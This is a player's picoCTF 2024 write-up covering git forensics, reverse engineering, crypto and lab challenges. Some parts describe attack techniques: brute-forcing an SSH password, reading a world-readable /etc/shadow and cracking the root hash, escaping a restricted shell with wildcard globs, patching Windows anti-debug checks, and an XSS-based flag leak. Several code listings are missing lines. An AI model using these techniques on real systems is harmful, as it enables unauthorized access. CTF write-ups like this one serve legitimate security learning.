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Playing Hacks and Stuffs!

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I participated in picoCTF 2024 organized by Carnegie Mellon University with team Fuji_, which took place between March 12, 2024 to March 26, 2024. It was a great solving the challenges and I learnt something new!

image image

I’ll be giving writeup to challenges I solved

Challenge Solved

General Skills


Reverse Engineering



Binary Exploitation

General Skills 10/10 :~

Super SSH


We are to ssh as ctf-player to titan.picoctf.net at port 50832 with password 84b12bae

So I just did that and got the flag :) image

Flag: picoCTF{s3cur3_c0nn3ct10n_07a987ac}

Commitment Issues


We are given a zip file and after unzipping it showed a git directory in the ./drop-in directory image

Going over there shows this image

From the challenge description we know the message was already deleted

So I checked the git logs image

The commit 87b85d7dfb839b077678611280fa023d76e017b8 was responsible in the creation of the flag

I checked it and got the flag image

Flag: picoCTF{s@n1t1z3_ea83ff2a}

Time Machine


We are given a zip file and after unzipping it showed a git directory in the ./drop-in directory (same as the previous challenge) image

Going over there shows this image

I just did the same thing I did before :) image

Flag: picoCTF{t1m3m@ch1n3_186cd7d7}

Blame Game


Same as the previous ones image

But this time around when I checked the git log it was much image

I checked from the first commit and saw this image

The flag was in the author field

Flag: picoCTF{@sk_th3_1nt3rn_d2d29f22}

Collaborative Development


Same as the previous one again image

In the git directory the python code there just prints out some word image

Checking the git log shows this image

So the flag isn’t there

On noticing that we are in the main branch I decided to see if there are other branch

Checking it shows this image

I switched to feature/part-1 image

We can see that it had one portion of the flag

I repeated this process for the two branches left image image

With that I just concatenated the 3 portions of the flag to form the full flag

Flag: picoCTF{t3@mw0rk_m@k3s_th3_dr3@m_w0rk_2c91ca76}



We are given a remote instance to connect to

After connecting to it I got this image

So we’ll be given two binary numbers and we are to perform various operations on it 6 times

Also the operations to be performed changes image

Tbh during this ctf I solved this manually since the number of times we get question are just 6

I can’t redo it here cause it’s stressfull and i’m too lazy to write a script now :(

But the process was that i received the two binary string convert them to integer with python int(binary, 2) then perform the operation expected and send the result as a binary string

With that on the 6th trial I got the flag



Reading the description we know that we need to guess a number with 1000 possibilities and we have just 10 trials

The challenge already hinted to use an Algorithm called Binary Search

We are given an attachment to download and on downloading it we see this bash script image image


# Generate a random number between 1 and 1000
target=$(( (RANDOM % 1000) + 1 ))

echo "Welcome to the Binary Search Game!"
echo "I'm thinking of a number between 1 and 1000."

# Trap signals to prevent exiting
trap 'echo "Exiting is not allowed."' INT
trap '' SIGQUIT
trap '' SIGTSTP

# Limit the player to 10 guesses

while (( guess_count < MAX_GUESSES )); do
    read -p "Enter your guess: " guess

    if ! [[ "$guess" =~ ^[0-9]+$ ]]; then
        echo "Please enter a valid number."

    (( guess_count++ ))

    if (( guess < target )); then
        echo "Higher! Try again."
    elif (( guess > target )); then
        echo "Lower! Try again."
        echo "Congratulations! You guessed the correct number: $target"

        # Retrieve the flag from the metadata file
        flag=$(cat /challenge/metadata.json | jq -r '.flag')
        echo "Here's your flag: $flag"
        exit 0  # Exit with success code

# Player has exceeded maximum guesses
echo "Sorry, you've exceeded the maximum number of guesses."
exit 1  # Exit with error code to close the connection

So let’s go over what it does:

Now that we are aware of what it does exactly we need to figure a way to guess the target value under the limited search sapce

To do that I implemented an algorithm called Binary Search

It’s basically an algorithm used to find the position of a value in a sorted array and it’s time complexity is O(log n)

To test my solution I ran it locally

Here’s the edited script


# Generate a random number between 1 and 1000

echo "Welcome to the Binary Search Game!"
echo "I'm thinking of a number between 1 and 1000."

# Limit the player to 10 guesses

while (( guess_count < MAX_GUESSES )); do
    read -p "Enter your guess: " guess

    if ! [[ "$guess" =~ ^[0-9]+$ ]]; then
        echo "Please enter a valid number."

    (( guess_count++ ))

    if (( guess < target )); then
        echo "Higher! Try again."
    elif (( guess > target )); then
        echo "Lower! Try again."
        echo "Congratulations! You guessed the correct number: $target"

        # Retrieve the flag from the metadata file
        #flag=$(cat /challenge/metadata.json | jq -r '.flag')
        echo "Here's your flag: $flag"
        exit 0  # Exit with success code

# Player has exceeded maximum guesses
echo "Sorry, you've exceeded the maximum number of guesses."
exit 1  # Exit with error code to close the connection

And my solve script

from pwn import *

context.log_level = 'debug'

io = process("./guessing_game.sh")


def binarySearch(N):
    left, right = 0, N


    while left <= right:
        middle = left + (right - left) // 2

        recv = io.recvline().decode().split()[0]

        if recv == "Lower!":
            right = middle - 1

        elif recv == "Higher!":
            left = middle + 1

            recv = io.recvline()
            return recv.decode()

N = 1000



Running it works! image

Now I need to do the same remotely

But pwntools was always hanging image

Because the number of guesses we can make is just 10 I decided to do it manually 😢 image

We see that the target value is lower than our input, so we set the new right pointer to middle - 1 and update the new middle value image

Now it’s higher so we set the left pointer to middle + 1 and update the new middle value image

Lower so we set the right pointer to middle - 1 and update the new middle value image

Hopefully you get the point…following the algorithm eventually made me get the right value image

Flag: picoCTF{g00d_gu355_6dcfb67c}



We are given a download file and after downloading it I saw it’s a C program image

The code is pretty much but the basic idea about it is that we will be given a word and we need to submit the little and big endian representation of the word

What is Endian? Endian refers to the order in which bytes are stored for multi-byte data types such as integers or floating-point numbers. There are two primary ways to represent these values in memory:

With that said I wrote a solve script

Here’s my solution

from pwn import *

io = remote("titan.picoctf.net", "63041")

io.recvuntil(b"Word: ")
word = io.recvline().strip()

little = [hex(i)[2:] for i in word[::-1]]
little_end = ''.join(little)

big = [hex(i)[2:] for i in word]
big_end = ''.join(big)


io.recvuntil(b"is: ")
flag = io.recvline()




We are given a remote instance to connect to

On doing that I got this image

I was confused at this point cause I have no idea what the password is and after trying silly guesses with no luck I decided to brute force

I wrote a script to achieve that this is it here: brute

After running the script I got the password to be My_Passw@rd_@1234

Using that worked! image

After it worked we got 2 questions which was easily solved once you search it up and then finally we spawn into a bash shell

Looking through the file system I couldn’t find the flag so I decided to escalate privilege

From doing some manual checks I found out that the /etc/shadow file is readable image

We got the root hash which was crackable image

At this point I just switched to user root with password iloveyou image

The flag was in the root directory

Flag: picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_ed6f9c71}



Connecting to the ssh instance I landed in a restricted shell image

I can’t seem to use some certain words….that’s what I thought at first

But after some trial I figured we can’t use any characters except some certain symbols and digits

After spending some hours on this I decided to do some research and found this awesome video of LiveOverflow solving a similar challenge here

From that I found out that we can access files using ? which represents like a wildcard in bash

First I need to know the path to the flag

I used an asterisk * on the current path and it showed this image

And using an asterisk on that path showed that the flag is there image

After some while my teammate was able to encode the flag using base32 image

Doing that gives the encoded flag image

/???/???/????32  ~/??????/????.???

On decoding the value we got the flag image

Flag: picoCTF{7h15_mu171v3r53_15_m4dn355_640b6add}

Forensics 2/7 :~

Mob psycho


For this category I really didn’t do much just two challenges my team mate solved the other challs there

In this challenge we are given an apk file

After downloading it I just unzipped it image image

I tried low hanging fruit things in this case search for a *.txt file to see if we can get the flag

Doing that indeed works but the flag was hex encoded which i just decoded image

Flag: picoCTF{ax8mC0RU6ve_NX85l4ax8mCl_5e67ea5e}



After downloading the file I saw the data is not recognizable by the file command image

I uploaded it to cyberchef inorder to view it’s hex dump image

From looking at the first line from the hex dump result I noticed something peculiar

00000000  e0 ff d8 ff 46 4a 10 00 01 00 46 49 01 00 00 01  |àÿØÿFJ....FI....|

The file seems to a jpeg file but in this case the bytes are flipped

Here’s what I mean

Taking a look at the signature of a valid jpeg file shows this image

FF D8 FF E0 00 10 4A 46 49 46 00 01

From this we can tell that for every 4 chunks it will basically flip it so that it’s in is reverse order

At this point of figuring that I wrote a script to do the opposite

def swap_chunks(data):
    chunks = []
    swapped_data = ""

    for i in range(0, len(data), 4):

    lt_idx = chunks[-1]
    chunks = chunks[:-1]
    swapped = b""

    for i in range(len(chunks)):
        swapped += chunks[i][::-1]

    return swapped

def main():
    input_file = 'challengefile'
    output_file = 'dump'

    with open(input_file, 'rb') as f:
        file_data = f.read()

    swapped_data = swap_chunks(file_data)

    with open(output_file, 'wb') as f:

if __name__ == "__main__":

Running that script gives a file and on checking the file type shows it’s indeed a jpeg file image

On viewing it gives the flag image

Flag: picoCTF{cert!f1Ed_iNd!4n_s0rrY_3nDian_f72c4bf7}

Reverse Engineering 7/7 :~



Downloading the binary attached and checking the file type shows this image

We see that it’s packed with UPX so i just unpacked it image

Running it shows that it expects a password image

Since I don’t know the password I decided to perform static reversing on the binary to see what it does

Loading it up in Ghidra and decompiling it takes few minutes because the binary is statically linked

But eventually after it does it’s thing the main function shows up image image

I didn’t bother reading it cause I noticed that it eventually gives the flag which is encoded in hex

puts("Password correct, please see flag: 7069636f4354467b5539585f556e5034636b314e365f42316e34526933535f31613561336633397d")

Decoding that hex value gives the flag image

Flag: picoCTF{U9X_UnP4ck1N6_B1n4Ri3S_1a5a3f39}



After downloading the binary I checked the file type image

Nothing special there except we’re dealing with a 64bits binary which is dynamically linked and not stripped

I ran it to get an overview of what it does but it just exits image

I used Ghidra to load the binary but then I saw it’s a C++ compiled binary then I immediately switched to IDA because it looks really ugly on Ghidra 🥲

Here’s the main function image image image

So we see some portion of the flag is being stored in memory

I just assummed that it builds up the flag in memory thus I switched to Dynamic Reversing

Loading it up and gdb and disassembling the main function image image

Now I just set a breakpoint right before it calls ret image

Starting the process hits the breakpoint image image

Now I just search for occurrence of pico & mate in memory image

With that I got the flag

Flag: picoCTF{wELF_d0N3_mate_7d29a538}

Classic Crackme 0x100


We are given a binary and a remote instance to connect to

Checking the file type of the binary shows this image

So the same as usual but this type we have debug_info present

Running the binary to get an overview of what it does shows this image

Looks like time we need to get the password

Loading it up in IDA to decompile it shows this as the main function image

int __fastcall main(int argc, const char **argv, const char **envp)
  char input[51]; // [rsp+0h] [rbp-A0h] BYREF
  char output[51]; // [rsp+40h] [rbp-60h] BYREF
  int random2; // [rsp+7Ch] [rbp-24h]
  int random1; // [rsp+80h] [rbp-20h]
  char fix; // [rsp+87h] [rbp-19h]
  int secret3; // [rsp+88h] [rbp-18h]
  int secret2; // [rsp+8Ch] [rbp-14h]
  int secret1; // [rsp+90h] [rbp-10h]
  int len; // [rsp+94h] [rbp-Ch]
  int i_0; // [rsp+98h] [rbp-8h]
  int i; // [rsp+9Ch] [rbp-4h]

  strcpy(output, "lxpyrvmgduiprervmoqkvfqrblqpvqueeuzmpqgycirxthsjaw");
  setvbuf(_bss_start, 0LL, 2, 0LL);
  printf("Enter the secret password: ");
  __isoc99_scanf("%50s", input);
  i = 0;
  len = strlen(output);
  secret1 = 85;
  secret2 = 51;
  secret3 = 15;
  fix = 97;
  while ( i <= 2 )
    for ( i_0 = 0; i_0 < len; ++i_0 )
      random1 = (secret1 & (i_0 % 255)) + (secret1 & ((i_0 % 255) >> 1));
      random2 = (random1 & secret2) + (secret2 & (random1 >> 2));
      input[i_0] = ((random2 & secret3) + input[i_0] - fix + (secret3 & (random2 >> 4))) % 26 + fix;
  if ( !memcmp(input, output, len) )
    printf("SUCCESS! Here is your flag: %s\n", "picoCTF{sample_flag}");
  return 0;

Looking at this we see that our input is going to pass through some sort of encryption scheme which is then eventually compared to the string stored in output

We can possibly brute force each character of the expected input since the encryption is deterministic

But the way I solved this was by using an SMT solver called Z3

Here’s my solve script

from z3 import *

output = "mpknnphjngbhgzydttvkahppevhkmpwgdzxsykkokriepfnrdm"
secret1 = 85
secret2 = 51
secret3 = 15
fix = 97
i = 0

s = Solver()

arr = [BitVec(f'f_{i}', 8) for i in range(len(output))]
tmp = [BitVec(f'f_{i}', 8) for i in range(len(output))]

for v in arr:
    s.add(v > 0x60)
    s.add(v < 0x7f)
while i < 3:
    for j in range(len(output)):
        random1 = ((secret1 & (j % 255)) + (secret1 & ((j % 255) >> 1))) 
        random2 = ((random1 & secret2) + (secret2 & (random1 >> 2))) 
        val = (((random2 & secret3) + arr[j] - fix + (secret3 & (random2 >> 4))) % 26 + fix) 
        arr[j] = val

    i += 1

for j in range(len(output)):
    s.add(arr[j] == ord(output[j]))

if s.check() == sat:
    m = s.model()
    inp = ""

    for i in tmp:
        inp += chr(m[i].as_long())

One thing to note there is that the constraint I used which let’s z3 know the range of value which our input should be is within ascii lowercase letters plus some special characters

Running that generates the a string image

We can test it locally image

On the remote instance we can connect to it and send that generated string as the password to get the flag image

Flag: picoCTF{s0lv3_angry_symb0ls_ddcc130f}



After downloading the attached file and checking it I got this image image image

This is a python bytecode

Since I wasn’t familiar with it I looked at the hint and saw they gave a python library image

After I checked it out I saw it’s a Disassembler for Python bytecode

From reading the documentation I saw various types of bytecode instructions: here

I also played with it to see how it works here’s an example image

After I’ve tried disassembling some various operations I decided to start with reversing the bytecode

First it stores some values into an array called input_list image

Note that the instruction LOAD_CONST pushes the value to the stack, and STORE_NAME implements STACK.pop() which basically moves the value on the stack to the variable we specified

Next it generates a string which is stored in variable key_str with value J_o3t image

At this point I spent some time trying to understand this:

  9         120 LOAD_CONST              36 (<code object <listcomp> at 0x7f704e8a4d40, file "snake.py", line 9>)
            122 LOAD_CONST              37 ('<listcomp>')
            124 MAKE_FUNCTION            0
            126 LOAD_NAME                1 (key_str)
            128 GET_ITER
            130 CALL_FUNCTION            1
            132 STORE_NAME               2 (key_list)

 11     >>  134 LOAD_NAME                3 (len)
            136 LOAD_NAME                2 (key_list)
            138 CALL_FUNCTION            1
            140 LOAD_NAME                3 (len)
            142 LOAD_NAME                0 (input_list)
            144 CALL_FUNCTION            1
            146 COMPARE_OP               0 (<)
            148 POP_JUMP_IF_FALSE      162

 12         150 LOAD_NAME                2 (key_list)
            152 LOAD_METHOD              4 (extend)
            154 LOAD_NAME                2 (key_list)
            156 CALL_METHOD              1
            158 POP_TOP
            160 JUMP_ABSOLUTE          134

Disassembly of <code object <listcomp> at 0x7f704e8a4d40, file "snake.py", line 9>:
  9           0 BUILD_LIST               0
              2 LOAD_FAST                0 (.0)
        >>    4 FOR_ITER                12 (to 18)
              6 STORE_FAST               1 (char)
              8 LOAD_GLOBAL              0 (ord)
             10 LOAD_FAST                1 (char)
             12 CALL_FUNCTION            1
             14 LIST_APPEND              2
             16 JUMP_ABSOLUTE            4
        >>   18 RETURN_VALUE

But basically it will iterate over each character in key_str and store it’s integer representation to a list key_list by using a list comprehension

key_list = [ord(i) for i in key_str]

Next it extends the key_list till the length is equal that of the input_list

while len(key_list) < len(input_list):

The next part is this

 15     >>  162 LOAD_CONST              38 (<code object <listcomp> at 0x7f704e8a4df0, file "snake.py", line 15>)
            164 LOAD_CONST              37 ('<listcomp>')
            166 MAKE_FUNCTION            0
            168 LOAD_NAME                5 (zip)
            170 LOAD_NAME                0 (input_list)
            172 LOAD_NAME                2 (key_list)
            174 CALL_FUNCTION            2
            176 GET_ITER
            178 CALL_FUNCTION            1
            180 STORE_NAME               6 (result)

 18         182 LOAD_CONST              39 ('')
            184 LOAD_METHOD              7 (join)
            186 LOAD_NAME                8 (map)
            188 LOAD_NAME                9 (chr)
            190 LOAD_NAME                6 (result)
            192 CALL_FUNCTION            2
            194 CALL_METHOD              1
            196 STORE_NAME              10 (result_text)
            198 LOAD_CONST              40 (None)
            200 RETURN_VALUE

Disassembly of <code object <listcomp> at 0x7f704e8a4df0, file "snake.py", line 15>:
 15           0 BUILD_LIST               0
              2 LOAD_FAST                0 (.0)
        >>    4 FOR_ITER                16 (to 22)
              6 UNPACK_SEQUENCE          2
              8 STORE_FAST               1 (a)
             10 STORE_FAST               2 (b)
             12 LOAD_FAST                1 (a)
             14 LOAD_FAST                2 (b)
             16 BINARY_XOR
             18 LIST_APPEND              2
             20 JUMP_ABSOLUTE            4
        >>   22 RETURN_VALUE

This is equivalent to doing

result = [a ^ b for a, b in zip(input_list, key_list)]

result_text = ''.join(map(chr, result))

At this point we can get tell what this bytecode does is to decrypt the input_list using xor with the key as the key_str

I decided to just reimplement that but then I got this image

input_list = [4, 54, 41, 0, 112, 32, 25, 49, 33, 3, 0, 0, 57, 32, 108, 23, 48, 4, 9, 70, 7, 110, 36, 8, 108, 7, 49, 10, 4, 86, 43, 106, 123, 89, 87, 18, 62, 47, 10, 78]
key_str = "J_o3t"

r = ''

for i in range(len(input_list)):
    xr = ord(key_str[i % len(key_str)]) ^ input_list[i]
    r += chr(xr)


That doesn’t work?

Luckily because xor is reversible I decided to retrieve the key since we know the plaintext should start with picoCTF and we’ve got the ciphertext image

Cool the key should be t_Jo3

Using that worked….here’s the solve script image

Flag: picoCTF{N0t_sO_coNfus1ng_sn@ke_516dfaee}


This series of Windows Antidebug Challenges are not currently in picogym

But since I do have the files saved I’ll go on ahead with the solution

I’ll only be writing about WinAntiDbg0x100-0x200 I wasn’t able to run the 3rd one on my host due to some DLL file missing so my teammate did that instead

For the first one we are given this set of files image

If we try to run it we get an error saying it needs to be run in a debugger image

Loading it up in IDA we can generate the pseudocode image image

int __cdecl main(int argc, const char **argv, const char **envp)
  char Block; // [esp+0h] [ebp-8h]
  char Blocka; // [esp+0h] [ebp-8h]
  WCHAR *lpOutputString; // [esp+4h] [ebp-4h]

  if ( (unsigned __int8)sub_401130() )
    if ( sub_401200() )
        L"### Level 1: Why did the clever programmer become a gardener? Because they discovered their talent for growing a"
         " 'patch' of roses!\n");
      if ( IsDebuggerPresent() )
        OutputDebugStringW(L"### Oops! The debugger was detected. Try to bypass this check to get the flag!\n");
        lpOutputString = (WCHAR *)sub_4013B0(dword_405408);
        if ( lpOutputString )
          OutputDebugStringW(L"### Good job! Here's your flag:\n");
          OutputDebugStringW(L"### ~~~ ");
          OutputDebugStringW(L"### (Note: The flag could become corrupted if the process state is tampered with in any way.)\n\n");
          OutputDebugStringW(L"### Something went wrong...\n");
      OutputDebugStringW(L"### Error reading the 'config.bin' file... Challenge aborted.\n");
    sub_401060((char *)lpMultiByteStr, Block);
    sub_401060("### To start the challenge, you'll need to first launch this program using a debugger!\n", Blocka);
  return 0;

From reading the code I could tell that this would open up the file config.bin performs some operation on it then makes sure we aren’t running the executable in a debugger using the windows IsDebuggerPresent api

So that should “prevent” us from using a debugger but we can easily bypass this

Remember that the eax/rax holds the return value from a called function

From the disassembly that handles that check I saw this: image

call    ds:IsDebuggerPresent
test    eax, eax
jz      short loc_CB161B

From that we can see that after the call to IsDebuggerPresent it checks if the eax register is 0 and if it is we should get to the function that prints the flag

There are two ways I could go about this

First I set a breakpoint at test eax, eax then modified the eax register which was set to 1 to 0 which bypasses the check

But then the program exited immediately and made me not able to even get the flag

That’s not an issue because if we take a look at the output tab we should see the flag there image

The next way to go about this is to directly patch the jz opcode to a jnz

To do that in IDA click on the opcode then go to:

Edit --> Patch Program --> Assemble


Now I just replaced that with then pressed Ok --> Cancel

jnz      short loc_CB161B

Now time to save the patched binary

Edit --> Patch Porgram --> Apply Patch to input file

With that the executable should be able to run bypassing the debugger check

Here’s how it looked here after running the newly patched executable in IDA image

Flag: picoCTF{d3bug_f0r_th3_Win_0x100_e70398c9}


Same type of file given again image

If we try to run it we get this error image

This time around we need to run it as admin

I opened IDA but with admin privilege this time around then loaded the executable to it

On generating the pseudocode I got this image image image

int __cdecl main(int argc, const char **argv, const char **envp)
  int v3; // eax
  char Block; // [esp+0h] [ebp-Ch]
  char Blockb; // [esp+0h] [ebp-Ch]
  char Blocka; // [esp+0h] [ebp-Ch]
  HANDLE hObject; // [esp+4h] [ebp-8h]
  WCHAR *lpOutputString; // [esp+8h] [ebp-4h]

  if ( !sub_4012F0() )
      "[ERROR] There are permission issues. This program requires debug privileges and hence you might want to run it as an Admin.\n",
    sub_401910("Challenge aborted. Please run this program as an Admin. Exiting now...\n", Blockb);
  hObject = CreateMutexW(0, 0, L"WinAntiDbg0x200");
  if ( !hObject )
    sub_401910("[ERROR] Failed to create the Mutex. Exiting now...\n", Block);
  if ( GetLastError() == 183 )
    if ( argc != 2 )
      sub_401910("[ERROR] Expected an argument\n", Block);
    v3 = atoi(argv[1]);
    if ( DebugActiveProcess(v3) )
  sub_401910((char *)lpMultiByteStr, Block);
  if ( (unsigned __int8)sub_401600() )
    if ( sub_401450() )
        L"### Level 2: Why did the parent process get a promotion at work? Because it had a \"fork-tastic\" child process "
         "that excelled in multitasking!\n");
      if ( (unsigned __int8)sub_4011D0() && IsDebuggerPresent() )
        lpOutputString = (WCHAR *)sub_401000(dword_4050A0);
        if ( lpOutputString )
          OutputDebugStringW(L"### Good job! Here's your flag:\n");
          OutputDebugStringW(L"### ~~~ ");
          OutputDebugStringW(L"### (Note: The flag could become corrupted if the process state is tampered with in any way.)\n\n");
          OutputDebugStringW(L"### Something went wrong...\n");
        OutputDebugStringW(L"### Oops! The debugger was detected. Try to bypass this check to get the flag!\n");
      OutputDebugStringW(L"### Error reading the 'config.bin' file... Challenge aborted.\n");
    sub_401910("### To start the challenge, you'll need to first launch this program using a debugger!\n", Blocka);
  return 0;

Looking at the code I noticed this line:

if ( (unsigned __int8)sub_4011D0() && IsDebuggerPresent() )

And the function sub_4011D0() basically trys to create a child process image image

The program comparism checks if the value returned from calling sub_4011D0() is 1 and if IsDebuggerPresent() returns 1 then we get the “error debugging message”

Ok now that we know this we just need to make sure it doesn’t meet this check

Looking at the assembly representation I saw this image

push    offset aLevel2WhyDidTh ; "### Level 2: Why did the parent process"...
call    ds:OutputDebugStringW
push    3
call    sub_401090
add     esp, 4
call    sub_4011D0
movzx   edx, al
test    edx, edx
jnz     short loc_401832

call    ds:IsDebuggerPresent
test    eax, eax
jz      short loc_401847

loc_401847: ; get flag :)
push    1
call    sub_401090
add     esp, 4
mov     eax, dword_40509C

Ok the assembly looks pretty good and this are the two main parts:

    call    sub_4011D0
    movzx   edx, al
    test    edx, edx
    jnz     short loc_401832

    call    ds:IsDebuggerPresent
    test    eax, eax
    jz      short loc_401847

For the first part, after it calls the sub_4011D0 function it sets edx to the value returned by the called function and it’s stored in the al register, then it checks if edx is zero and finally it jumps if not zero to the function that handles the “error message” else it moves on to the IsDebuggerPresent check

From this we know that edx must equal 0 for we to bypass this check

For this I set a breakpoint at the test edx, edx instruction then I start the process

To set a breakpoint in IDA we can just click on F2 at the instruction we want to break at or just right click and choose add breakpoint

Doing that I got this image

Looking at the “General Registers” tab we see that EDX currently is 1

So we need to patch that opcode from a jnz --> jz which is basically saying jump to the isdebugger check if edx is not zero

The next part is what we did in the previous WinAntiDbg0x100 challenge

Just patch jz --> jnz

With that said after doing that I got the flag image

Flag: picoCTF{0x200_debug_f0r_Win_c6db2768}

Web 10/10 :~



I actually wasn’t the one who solved this but I helped in writing the solve script since our solution takes quite some time before exfiltrating the flag

You can read up on how to solve it here and the other web challenges: solution

And here’s my solve script

Basically what it does is to brute force the flag character by character using the xss payload which causes the chrome browser to crash once the character being guessed is right

If it crashes, the python script itself stops and I couldn’t figure a way to make it continue when the “server instance” isn’t reachable which means the chrome browser crashed

So because of that I actually had to do manual changing of the index and updating the known flag character leaked

It was quite a bit of pain but after about ~3hours from guessing the right words and brute force we got the flag

Flag: picoCTF{little_alchemy_was_the_0g_game_does_anyone_rememb3r_9889fd4a}

Cryptography 4/5 :~



After downloading the attached file and checking it I saw it was base64 encoded image

I decoded it using the cli tool and got another base64 encoded value image

On further decoding gives a value which seems to be shifted image

I then used dcodefr caesar cipher decoder to get the flag image

Flag: 	picoCTF{caesar_d3cr9pt3d_a47c6d69}

Custom encryption


We are given a python file and the encoded flag

from random import randint
import sys

def generator(g, x, p):
    return pow(g, x) % p

def encrypt(plaintext, key):
    cipher = []
    for char in plaintext:
        cipher.append(((ord(char) * key*311)))
    return cipher

def is_prime(p):
    v = 0
    for i in range(2, p + 1):
        if p % i == 0:
            v = v + 1
    if v > 1:
        return False
        return True

def dynamic_xor_encrypt(plaintext, text_key):
    cipher_text = ""
    key_length = len(text_key)
    for i, char in enumerate(plaintext[::-1]):
        key_char = text_key[i % key_length]
        encrypted_char = chr(ord(char) ^ ord(key_char))
        cipher_text += encrypted_char
    return cipher_text

def test(plain_text, text_key):
    p = 97
    g = 31

    if not is_prime(p) and not is_prime(g):
        print("Enter prime numbers")
    a = randint(p-10, p)
    b = randint(g-10, g)
    # a = 89
    # b = 27
    print(f"a = {a}")
    print(f"b = {b}")

    u = generator(g, a, p)
    v = generator(g, b, p)
    key = generator(v, a, p)
    b_key = generator(u, b, p)

    shared_key = None

    if key == b_key:
        shared_key = key
        print("Invalid key")
    semi_cipher = dynamic_xor_encrypt(plain_text, text_key)
    cipher = encrypt(semi_cipher, shared_key)
    print(f'cipher is: {cipher}')

if __name__ == "__main__":
    # message = sys.argv[1]
    test(message, "trudeau")

Here’s the encoded flag file content

a = 89
b = 27
cipher is: [33588, 276168, 261240, 302292, 343344, 328416, 242580, 85836, 82104, 156744, 0, 309756, 78372, 18660, 253776, 0, 82104, 320952, 3732, 231384, 89568, 100764, 22392, 22392, 63444, 22392, 97032, 190332, 119424, 182868, 97032, 26124, 44784, 63444]

I’ll go through what the encryption scheme is

First it imports two python modules

from random import randint
import sys

Then it calls function test passing the first argument which is the message as the first parameter and the second parameter is the key

if __name__ == "__main__":
    message = sys.argv[1]
    test(message, "trudeau")

Here’s the test function code

def test(plain_text, text_key):
    p = 97
    g = 31
    if not is_prime(p) and not is_prime(g):
        print("Enter prime numbers")
    a = randint(p-10, p)
    b = randint(g-10, g)
    print(f"a = {a}")
    print(f"b = {b}")
    u = generator(g, a, p)
    v = generator(g, b, p)
    key = generator(v, a, p)
    b_key = generator(u, b, p)
    shared_key = None
    if key == b_key:
        shared_key = key
        print("Invalid key")
    semi_cipher = dynamic_xor_encrypt(plain_text, text_key)
    cipher = encrypt(semi_cipher, shared_key)
    print(f'cipher is: {cipher}')

So it stores two prime number in variable p & g and makes sure they are prime

Next it generates a, b which are random number between (p-10) & p and (g-10) & g respectively

We are given the value of a & b

It calls function generator passing g, a & p as the parameter where the result is stored in variable u and the same is done with with g, b, p which is stored in v

Here’s what the generator function does

def generator(g, x, p):
    return pow(g, x) % p

Basically what that does is to take the power of g to x modded with p i.e (g ** x) mod p

And it generates u, v, key & b_key

This is actually a known cryptography implementation called Diffie–Hellman key exchange

But here we are given just the private exponent

Still we can calculate u & v

a, b = 89, 27
p, g = 97, 31

u = generator(g, a, p)
v = generator(g, b, p)
key = generator(v, a, p)
b_key = generator(u, b, p)

assert key == b_key
shared_key = key

Back to the code it calls function dynamic_xor_encrypt passing the message & text_key as the parameter

Here’s what it does

def dynamic_xor_encrypt(plaintext, text_key):
    cipher_text = ""
    key_length = len(text_key)
    for i, char in enumerate(plaintext[::-1]):
        key_char = text_key[i % key_length]
        encrypted_char = chr(ord(char) ^ ord(key_char))
        cipher_text += encrypted_char
    return cipher_text

So it basically just performs a xor operation but this time it reverses the message string which is then xored

After that it generates a cipher which is the value return from calling function cipher passing the xored value and the shared key as the parameter

Here’s what the function does

def encrypt(plaintext, key):
    cipher = []
    for char in plaintext:
        cipher.append(((ord(char) * key*311)))
    return cipher

For each character in the “xored value” it multiplies it by key*311

And the result is appended to a cipher list and returned to us

Now how to solve this?

Since we know the key and xor key we can just reverse the process used to encrypt the flag

First we need to deal with the encrypt function

cipher = char * (key*311)

To recover char we can simply do this

char = cipher // (key*311)

Ok that’s the first step and with we should retreive the xored value

Now how do we reverse xor?

Well xor is reversible by this

a ^ b == c
a ^ c == b
b ^ a == a

We can just make use of this commutative property of xor to retrieve the plaintext

xored = plaintext ^ key
plaintext = xored ^ key

With that said here’s my solve script

def generator(g, x, p):
    return pow(g, x) % p

def decrypt(cipher, shared_key):
    semi_cipher =  ""
    for value in cipher:
        semi_cipher += chr(value // (shared_key * 311))

    return semi_cipher

def xor_pwn(enc, key):
    pt = ""
    k_len = len(key)

    for idx, val in enumerate(enc[::-1]):
        k_chr = key[idx % k_len]
        d_chr = chr(ord(k_chr) ^ ord(val))
        pt += d_chr

a, b = 89, 27
p, g = 97, 31

u = generator(g, a, p)
v = generator(g, b, p)
key = generator(v, a, p)
b_key = generator(u, b, p)

assert key == b_key
shared_key = key

cipher = [33588, 276168, 261240, 302292, 343344, 328416, 242580, 85836, 82104, 156744, 0, 309756, 78372, 18660, 253776, 0, 82104, 320952, 3732, 231384, 89568, 100764, 22392, 22392, 63444, 22392, 97032, 190332, 119424, 182868, 97032, 26124, 44784, 63444]
semi_cipher = decrypt(cipher, shared_key)
flag = xor_pwn(semi_cipher[::-1], "trudeau")

Running it gives the flag image

Flag: picoCTF{custom_d2cr0pt6d_dc499538}



We are given a python file and a ciphertext image

import sys
chars = ""
from fileinput import input
for line in input():
  chars += line

lookup1 = "\n \"#()*+/1:=[]abcdefghijklmnopqrstuvwxyz"
lookup2 = "ABCDEFGHIJKLMNOPQRSTabcdefghijklmnopqrst"

out = ""

prev = 0
for char in chars:
  cur = lookup1.index(char)
  out += lookup2[(cur - prev) % 40]
  prev = cur


Ok basically this code will iterate through our input and get the index of the current character in the lookup1 string, then it subtracts the index with the prev variable which is set to 0 initially and is modded by 40. The result is used as the index to get the character specified at the string lookup2 and finally it updates the variable prev to the current index cur

We can easily reverse this process

lookup1 = "\n \"#()*+/1:=[]abcdefghijklmnopqrstuvwxyz"
lookup2 = "ABCDEFGHIJKLMNOPQRSTabcdefghijklmnopqrst"


out = ""

prev = 0
for char in ciphertext:
    cur = lookup2.index(char)
    out += lookup1[(cur + prev) % 40]
    prev = (cur + prev) % 40


Running that gives another python code image


chars = ""
from fileinput import input
for line in input():
    chars += line
b = 1 / 1

for i in range(len(chars)):
    if i == b * b * b:
        print chars[i] #prints
        b += 1 / 1

Hmm nothing sus there

I just stored the result obtained from the first reversed operation and used that for this new python code retrieved

And that gave me the word which is the flag

Here’s my solve script

lookup1 = "\n \"#()*+/1:=[]abcdefghijklmnopqrstuvwxyz"
lookup2 = "ABCDEFGHIJKLMNOPQRSTabcdefghijklmnopqrst"


out = ""

prev = 0
for char in ciphertext:
    cur = lookup2.index(char)
    out += lookup1[(cur + prev) % 40]
    prev = (cur + prev) % 40

chars = out
b = 1 / 1

r = ""

for i in range(len(chars)):
    if i == b * b * b:
        r += chars[i] 
        b += 1 / 1



Flag: picoCTF{adlibs}

Rsa Oracle


